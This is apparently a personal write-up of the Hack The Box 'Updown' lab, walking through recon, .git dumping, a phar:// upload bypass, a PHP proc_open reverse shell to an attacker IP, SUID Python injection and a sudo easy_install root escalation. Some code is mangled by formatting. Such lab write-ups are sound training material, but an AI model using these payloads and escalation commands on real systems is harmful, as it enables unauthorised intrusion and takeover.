Updown

March 02, 2025

---

Created by	Page	Difficulty	OS
AB2	Hack The Box	Medium	Linux

---

• The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.177 -oG scan
    /opt/extractports scan
    nmap -p22,80 -sCV -Pn 10.10.11.177 -oN ports
  

  

• When I enter the web page I find the domain siteisup.htb and add it to the hosts file.
• The website allows you to see if a page is active or not. The first thing that comes to my mind is to list hosts or ports not accessible from my machine but I can’t find any.
• When listing subdomains I find dev.siteisup.htb

• I decide to list directories with several dictionaries and I find one called dev and inside it I find a git repository.

    gobuster dir -u http://10.10.11.177/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200
    gobuster dir -u http://siteisup.htb/dev/ -w /usr/share/wordlists/dirb/common.txt -t 50 --exclude-length  281
  

  

• I decide to download all the content of the repository with git-dumper to bring it to me locally and analyze it.

    pip install git-dumper
    git-dumper http://10.10.101.177/dev/.git/ ./repo
  

• Inside the repository files I find in the .htaccess some indications to be able to reach a new point. I also find inside the changelog.txt file a message that indicates that the uploading of files is allowed so far.

  

• By following the instructions I get to a panel that allows me to upload files but after a while they are deleted.

• I try to automate the upload of a file and its reading by means of 2 scripts but after some time I analyze it and I see that I have no possibility to access the system through this

  • Read file ```python #!/usr/bin/python import os import sys import signal import time import hashlib import string from pwn import * import requests

  def def_handler(sig, frame): print(“\n\n[!]Saliendo….\n”) sys.exit(1)

  signal.signal(signal.SIGINT, def_handler)

  fileName=”targetlist”

  def simple_get(name):

        value = int(time.time())
        md5_hash = hashlib.md5()
        md5_hash.update(str(value).encode('utf-8'))
        folder = md5_hash.hexdigest()
        simple_url = "http://dev.siteisup.htb/index.php?page=./uploads/" + folder + "/" + name
        #print(simple_url)
        burp0_headers = {"Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", "Special-Dev": "only4dev"}
        response = requests.get(simple_url, headers=burp0_headers)
        if (len(response.text) != 78):
                print(response.text)
  

  def exploit(): simple_get(fileName)

  if name == ‘main’: exploit()

  	
    - Upload file
    ```python
    #!/usr/bin/python
    import os
    import sys
    import signal
    import time
    import hashlib
    import string
    from pwn import *
    import requests
  	
    def def_handler(sig, frame):
            print("\n\n[!]Saliendo....\n")
            sys.exit(1)
  	
    signal.signal(signal.SIGINT, def_handler)
  	
  	
    fileName="targetlist"
    def upload_file():
            burp0_url = "http://dev.siteisup.htb/"
            burp0_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------36499159163642205144645867988", "Origin": "http://dev.siteisup.htb", "Connection": "keep-alive", "Referer": "http://dev.siteisup.htb/", "Upgrade-Insecure-Requests": "1", "Special-Dev": "only4dev"}
            burp0_data = "-----------------------------36499159163642205144645867988\r\nContent-Disposition: form-data; name=\"file\"; filename=\"targetlist\"\r\nContent-Type: application/octet-stream\r\n\r\nhttp://10.10.11.177/dev\nhttp://10.10.11.177/\nhttp://10.10.11.177/dev/.git\n\r\n-----------------------------36499159163642205144645867988\r\nContent-Disposition: form-data; name=\"check\"\r\n\r\nCheck\r\n-----------------------------36499159163642205144645867988--\r\n"
            requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
  	
    def simple_get(name):
  	
            value = int(time.time())
            md5_hash = hashlib.md5()
            md5_hash.update(str(value).encode('utf-8'))
            folder = md5_hash.hexdigest()
  	
  	
            simple_url = "http://dev.siteisup.htb/index.php?page=./uploads/" + folder + "/" + name
            #print(simple_url)
            burp0_headers = {"Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", "Special-Dev": "only4dev"}
            response = requests.get(simple_url, headers=burp0_headers)
            if (len(response.text) != 78):
                    print(response.text)
  	
    def exploit():
            #upload_file()
            simple_get(fileName)
  	
    if __name__ == '__main__':
            exploit()
  	
  

• I choose to create a file with the php info. I zip this file and rename it to look like a txt file. I upload the file and when I consult it I apply a wrapper that allows to execute the .zip and .phar files as a php file

    echo "<?php phpinfo(); ?>" > info.php
    zip info.zip info.php
    mv info.zip info.txt
  	
    GET /index.php?page=phar://uploads/53aa66f6ed5053a31bf29296762f46f1/info.txt/info
  

• Within the disabled functions I can’t find proc_open so I try to create a revershell using that function.

  

    <?php
        $cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.24/4444 0>&1'";
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $process = proc_open($cmd, $descriptorspec, $pipes);
        if (is_resource($process)){
            fclose($pipes[0]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close(%process);
        }
    ?>
  

• I get a shell and search for files with the SUID permission set. I find a binary that is not common

    find / -perm -4000 2>/dev/null
  

  

• Looking at the contents of the file I find the input function that is capable of executing commands.

  

• I run the finario and add code to launch a terminal as the user running the program, in this case developer. Thanks to this I become this user and I get to read the first flag.

    ./siteisup
    __import__('os').system('/bin/bash')
  

• I list the binaries that this user can run as root without providing a password and find one.

  

• With the help of gtfobins I manage to exploit this binary, escalate my privileges and read the second flag.

    TF=$(mktemp -d)
    echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
    sudo /usr/local/bin/easy_install  $TF